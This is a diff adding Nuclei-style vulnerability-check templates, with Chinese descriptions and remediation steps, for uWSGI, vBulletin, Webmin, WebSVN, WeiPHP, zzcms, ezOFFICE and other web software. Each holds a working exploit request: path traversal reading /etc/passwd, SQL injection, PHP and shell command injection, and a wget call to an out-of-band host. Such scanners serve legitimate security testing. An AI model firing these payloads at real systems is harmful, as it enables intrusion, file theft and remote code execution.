000000000..b8ec6c31c --- /dev/null +++ b/config/51pwn/yaml/uWSGI/CVE-2018-7490.yaml @@ -0,0 +1,42 @@ +id: CVE-2018-7490 +info: + name: uWSGI PHP Plugin Local File Inclusion + author: + - l0ne1y + description: |- + uWSGI 路径遍历漏洞 + uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。 + + uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘..’序列的特制URL请求利用该漏洞查看系统上的任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、升级系统至无漏洞版本,或于官网下载安全补丁 + + 临时修复方案: + 文件上传: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - 'root:.*:0:0:' + matchers-condition: and + path: + - '{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' + method: GET diff --git a/config/51pwn/yaml/vBulletin/CVE-2018-6200.yaml b/config/51pwn/yaml/vBulletin/CVE-2018-6200.yaml new file mode 100755 index 000000000..680a33f23 --- /dev/null +++ b/config/51pwn/yaml/vBulletin/CVE-2018-6200.yaml @@ -0,0 +1,33 @@ +id: CVE-2018-6200 +info: + name: vBulletin 3.x.x & 4.2.x - Open Redirect + author: + - l0ne1y + description: |- + vBulletin 3.x.x & 4.2.x URL重定向 + vBulletin是美国Internet Brands和vBulletin Solutions公司共同开发的一款开源的商业Web论坛程序。 + + vBulletin 3.x.x版本和4.2.x版本至4.2.5版本中存在开放重定向漏洞。攻击者可通过向redirector.php文件发送‘url’参数利用该漏洞实施钓鱼攻击,窃取用户证书。 + severity: medium + remediation: |- + 官方修复方案: + 1、升级系统至无漏洞版本,或于官网下载安全补丁 + + 临时修复方案: + 1、代码固定跳转地址,不让用户控制变量。 + 2、跳转目标地址采用白名单映射机制、只对合法的 URL 做跳转。 + 3、合理充分的校验校验跳转的目标地址,非己方地址时告知用户跳转风险。 +requests: +- matchers: + - type: word + part: body + words: + - <meta http-equiv="refresh" content="0; URL=https://www.baidu.com"> + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/redirector.php?url=https://www.baidu.com' + - '{{BaseURL}}/redirector.php?do=nodelay&url=https://www.baidu.com' + method: GET diff --git a/config/51pwn/yaml/vBulletin/CVE-2019-16759.yaml b/config/51pwn/yaml/vBulletin/CVE-2019-16759.yaml new file mode 100755 index 000000000..b071588fe --- /dev/null +++ b/config/51pwn/yaml/vBulletin/CVE-2019-16759.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-16759 +info: + name: vBulletin v5.0.0-v5.5.4 - Remote Command Execution + author: + - l0ne1y + description: |- + vBulletin 远程命令执行 + vBulletin是美国InternetBrands和vBulletinSolutions公司的一款基于PHP和MySQL的开源Web论坛程序。 + + vBulletin 5.x版本至5.5.4版本中存在安全漏洞。攻击者可借助‘widgetConfig[code]’参数利用该漏洞执行命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、升级系统至无漏洞版本,或于官网下载安全补丁 + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + words: + - '{{verify}}' + matchers-condition: and + raw: + - | + POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=var_dump({{verify}}); +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/vBulletin/CVE-2020-12720.yaml b/config/51pwn/yaml/vBulletin/CVE-2020-12720.yaml new file mode 100755 index 000000000..a20f9dd52 --- /dev/null +++ b/config/51pwn/yaml/vBulletin/CVE-2020-12720.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-12720 +info: + name: vBulletin SQL Injection + author: + - l0ne1y + description: |- + vBulletin SQL注入漏洞 + vBulletin 5.6.1 版存在远程 SQL 注入漏洞 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: |- + 官方修复方案: + 1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1 + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + words: + - '{{verify}}rce' + raw: + - | + POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Accept: */* + Content-Type: application/x-www-form-urlencoded + + nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27{{vbulletin}}%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+- +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/vBulletin/CVE-2020-17496.yaml b/config/51pwn/yaml/vBulletin/CVE-2020-17496.yaml new file mode 100755 index 000000000..521091e56 --- /dev/null +++ b/config/51pwn/yaml/vBulletin/CVE-2020-17496.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-17496 +info: + name: vBulletin 5.5.4 - 5.6.2- Remote Command Execution + author: + - l0ne1y + description: |- + vBulletin 远程命令执行 + vBulletin是美国InternetBrands和vBulletinSolutions公司的一款基于PHP和MySQL的开源Web论坛程序。 + + vBulletin 5.5.4版本至5.6.2版本中存在安全漏洞。攻击者可借助带有特制subWidgets数据的ajax/render/widget_tabbedcontainer_tab_panel请求利用该漏洞执行命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。' +requests: +- matchers: + - type: word + words: + - '{{verify}}' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('echo {{verify}}'); exit;" +variables: + verify: '{{rand_text_alphanumeric(8,"")}}' diff --git a/config/51pwn/yaml/webEdition CMS/CVE-2014-5258.yaml b/config/51pwn/yaml/webEdition CMS/CVE-2014-5258.yaml new file mode 100755 index 000000000..9bf6bed09 --- /dev/null +++ b/config/51pwn/yaml/webEdition CMS/CVE-2014-5258.yaml @@ -0,0 +1,40 @@ +id: CVE-2014-5258 +info: + name: webEdition 6.3.8.0 - Directory Traversal + author: + - l0ne1y + tags: + - cve + - cve2014 + - lfi + description: |- + webEdition CMS 目录遍历漏洞 + webEdition CMS是一套基于LAMP架构的开源网站内容管理系统(CMS)。该系统包含用户权限管理模块、新闻邮件管理模块等。 + + webEdition CMS 6.3.8.0及之前版本的showTempFile.php脚本存在目录遍历漏洞。远程攻击者可借助‘file’参数中的目录遍历字符‘..’利用该漏洞读取任意文件。 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2014-5258 + - https://www.exploit-db.com/exploits/34761 + - http://packetstormsecurity.com/files/128301/webedition-6.3.8.0-path-traversal.html + - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0 + severity: high + classification: + cve-id: + - cve-2014-5258 + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0\n\n\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。\n" +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/webmin/CVE-2019-15107.yaml b/config/51pwn/yaml/webmin/CVE-2019-15107.yaml new file mode 100755 index 000000000..6e0952de7 --- /dev/null +++ b/config/51pwn/yaml/webmin/CVE-2019-15107.yaml @@ -0,0 +1,36 @@ +id: CVE-2019-15107 +info: + name: Webmin <= 1.920 Unauthenticated Remote Command Execution + author: + - l0ne1y + description: |- + Webmin 1.920之前版本远程命令执行漏洞 + 在 Webmin <=1.920 中发现了一个问题。password_change.cgi 中的参数 old 执行未经身份验证的远程命令执行 + severity: critical + remediation: |- + 官方修复建议: + 厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: + https://www.webmin.com/ + + 临时修复建议: + + 1、过滤".",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + dsl: + - contains(body,randstr) && status_code!=404 + matchers-condition: and + raw: + - |- + POST /password_change.cgi HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Referer: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + user=rootxx&pam=&old=test|echo {{randstr}}&new1=test2&new2=test2&expired=2 diff --git a/config/51pwn/yaml/webmin/webmin-panel.yaml b/config/51pwn/yaml/webmin/webmin-panel.yaml new file mode 100755 index 000000000..1a59d4332 --- /dev/null +++ b/config/51pwn/yaml/webmin/webmin-panel.yaml @@ -0,0 +1,27 @@ +id: webmin-panel +info: + name: Webmin Admin Panel + author: + - l0ne1y + description: |- + webmin页面敏感信息泄露 + 通过访问特定的路径,可以获取webmin的title信息导致webmin敏感信息泄露。 + severity: low + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.webmin.com/ + 临时修复方案: + 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 + 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: word + part: body + words: + - <title>Login to Webmin + path: + - '{{BaseURL}}' + - '{{BaseURL}}/webmin/' + method: GET + redirects: true diff --git a/config/51pwn/yaml/websvn/CVE-2021-32305.yaml b/config/51pwn/yaml/websvn/CVE-2021-32305.yaml new file mode 100755 index 000000000..d94870d61 --- /dev/null +++ b/config/51pwn/yaml/websvn/CVE-2021-32305.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-32305 +info: + name: Websvn <2.6.1 - Remote Code Execution + author: + - gy741 + tags: + - cve + - cve2021 + - websvn + - rce + - oast + description: |+ + websvn 操作系统命令注入漏洞 + websvn是一个应用软件。一个在线Subversion存储库浏览器。 + + WebSVN 2.6.1之前版本存在安全漏洞,该漏洞允许远程攻击者通过搜索参数中的shell元字符执行任意命令。 + + reference: + - https://packetstormsecurity.com/files/163225/websvn-2.6.0-remote-code-execution.html + - /~https://github.com/websvnphp/websvn/pull/142 + - http://packetstormsecurity.com/files/163225/websvn-2.6.0-remote-code-execution.html + - https://nvd.nist.gov/vuln/detail/cve-2021-32305 + severity: critical + classification: + cve-id: + - cve-2021-32305 + cwe-id: + - cwe-78 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/websvnphp/websvn + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + raw: + - | + GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* diff --git a/config/51pwn/yaml/weiphp/CNVD-2020-68596.yaml b/config/51pwn/yaml/weiphp/CNVD-2020-68596.yaml new file mode 100755 index 000000000..01274a79f --- /dev/null +++ b/config/51pwn/yaml/weiphp/CNVD-2020-68596.yaml @@ -0,0 +1,45 @@ +id: CNVD-2020-68596 +info: + name: WeiPHP 5.0 - Path Traversal + author: + - pikpikcu + description: |- + WeiPHP敏感信息泄露漏洞 + 深圳市圆梦云科技有限公司WeiPHP存在文件读取漏洞,攻击者可利用该漏洞获取敏感信息 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.weiphp.cn/ + 临时修复方案: + 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 + 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - https://weiphp.cn + - WeiPHP + - DB_PREFIX + extractors: + - name: endpoint + type: regex + regex: + - /public/uploads/picture/(.*.jpg) + part: body + internal: true + raw: + - | + POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + "1":1 + - | + GET /public/index.php/home/file/user_pics HTTP/1.1 + Host: {{Hostname}} + - | + GET {{endpoint}} HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/weiphp/Weiphp-SQLi.yaml b/config/51pwn/yaml/weiphp/Weiphp-SQLi.yaml new file mode 100755 index 000000000..40e6ae470 --- /dev/null +++ b/config/51pwn/yaml/weiphp/Weiphp-SQLi.yaml @@ -0,0 +1,32 @@ +id: Weiphp-SQLi +info: + name: Weiphp SQLinjection + author: + - l0ne1y + description: |- + Weiphp sql注入漏洞 + Weiphp 在/public/index.php/home/index/bind_follow/?publicid处通过参数uid[1]可以执行sql注入漏洞。 + severity: critical + remediation: |- + 官方修复建议: + 1、升级系统至无漏洞版本,或于官网下载安全补丁 + http://www.weiphp.cn/ + + 临时修复建议: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + dsl: + - contains(body,randstr) && status_code!=404 + path: + - '{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,{{randstr}},0x7e),1)--+' + method: GET + redirects: true diff --git a/config/51pwn/yaml/xunchi CMS/CNVD-2020-23735.yaml b/config/51pwn/yaml/xunchi CMS/CNVD-2020-23735.yaml new file mode 100755 index 000000000..8ab5aad45 --- /dev/null +++ b/config/51pwn/yaml/xunchi CMS/CNVD-2020-23735.yaml @@ -0,0 +1,43 @@ +id: CNVD-2020-23735 +info: + name: Xxunchi Local File read + author: + - l0ne1y + tags: + - xunchi + - lfi + - cnvd + - cnvd2020 + description: |- + xunchi CMS存在任意文件读取漏洞 + 衡水迅驰互联网信息服务有限公司是基于互联网络提供域名注册、营销型网站建设、整站SEO优化、 阿里巴巴托管、综合推广等全面电子商务咨询与解决方案的IT公司,公司致力于为衡水本地企业、政府、组织及个人等提供全方位的互联网电子商务服务。 + + 迅优cms存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。 + reference: + - https://www.cnvd.org.cn/flaw/show/2025171 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.cnxunchi.com/ + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - NzbwpQSdbY06Dngnoteo2wdgiekm7j4N + - display_errors + matchers-condition: and + path: + - '{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php' + method: GET diff --git a/config/51pwn/yaml/yccms/yccms-rce.yaml b/config/51pwn/yaml/yccms/yccms-rce.yaml new file mode 100755 index 000000000..55082618d --- /dev/null +++ b/config/51pwn/yaml/yccms/yccms-rce.yaml @@ -0,0 +1,27 @@ +id: yccms-rce +info: + name: YCCMS 3.3 CSRF漏洞--代码执行 + author: + - l0ne1y + description: |- + YCCMS 3.3代码执行漏洞 + file_exists函数主要作用是检查文件是否存在,但是这个函数在进行检查会有一个bug,如/controller/admin;/…/,函数允许路径中有一些特殊字符,并且遇到/…/会返回到上级目录,可以利用这个策略逃逸出file_exists()函数检查,最后一个利用点eval可以执行多条语句,如:eval(echo 1;echo 2;);可以成功执行两条语句 + reference: + - https://blog.csdn.net/qq_36374896/article/details/84839891 + severity: critical + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + part: body + words: + - '{{randstr}}' + path: + - '{{BaseURL}}/admin/?a=Factory();print({{randstr}});//../' + method: GET diff --git a/config/51pwn/yaml/zzcms/zzcms-zsmanage-sqli.yaml b/config/51pwn/yaml/zzcms/zzcms-zsmanage-sqli.yaml new file mode 100755 index 000000000..6b7017eee --- /dev/null +++ b/config/51pwn/yaml/zzcms/zzcms-zsmanage-sqli.yaml @@ -0,0 +1,47 @@ +id: zzcms-zsmanage-sqli +info: + name: zzcms-zsmanage-sqli + author: + - l0ne1y + description: "zzcms 存在SQL注入漏洞\n通过白盒审计工具,发现 /user/del.php 存在SQL注入漏洞,$tablename 可控,可以进行SQL注入。由于$tablename + 所在位置无需闭合引号和CMS过滤大于号和小于号(转换为实体),拼接为 select id,editor, from zzcms_answer where id + = 1 and if((ascii(substr(user(),1,1)) =121),sleep(5),1)#where id in 1; 拼接成如此的SQL语句可以完成注入。 " + reference: + - /~https://github.com/jcqsteven/blog/issues/18 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: status + status: + - 200 + path: + - '{{BaseURL}}/user/zs.php?do=save' + method: POST + body: proname={{randstr}}&tz=1%E4%B8%87%E4%BB%A5%E4%B8%8B&prouse={{r0}}&sx%5B%5D=&sx%5B%5D=&sm={{r0}}&province=%E5%85%A8%E5%9B%BD&city=%E5%85%A8%E5%9B%BD%E5%90%84%E5%9C%B0%E5%8C%BA&xiancheng=&cityforadd=&img=%2Fimage%2Fnopic.gif&flv=&zc=&yq=&action=add&Submit=%E5%A1%AB%E5%A5%BD%E4%BA%86%EF%BC%8C%E5%8F%91%E5%B8%83%E4%BF%A1%E6%81%AF&smallclassid[]=1&smallclassid[]=2)%20union%20select%20{{randstr}}%23 + headers: + Content-Type: application/x-www-form-urlencoded +- matchers: + - type: word + part: body + words: + - '{{randstr}}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/user/zsmanage.php' + method: GET diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/ssvid-89511.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/ssvid-89511.yaml" new file mode 100755 index 000000000..07f5fc6d8 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/ssvid-89511.yaml" @@ -0,0 +1,35 @@ +id: ssvid-89511 +info: + name: 万户OA协同办公管理平台 downloadhttp.jsp 任意文件下载 + author: + - 折跃 + description: |- + 万户ezOFFICE downloadhttp.jsp 任意文件下载漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在任意文件下载漏洞,攻击者可利用漏洞读取任意文件内容。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、过滤".",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'filter-mapping') + path: + - '{{BaseURL}}/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../WEB-INF/web.xml' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git 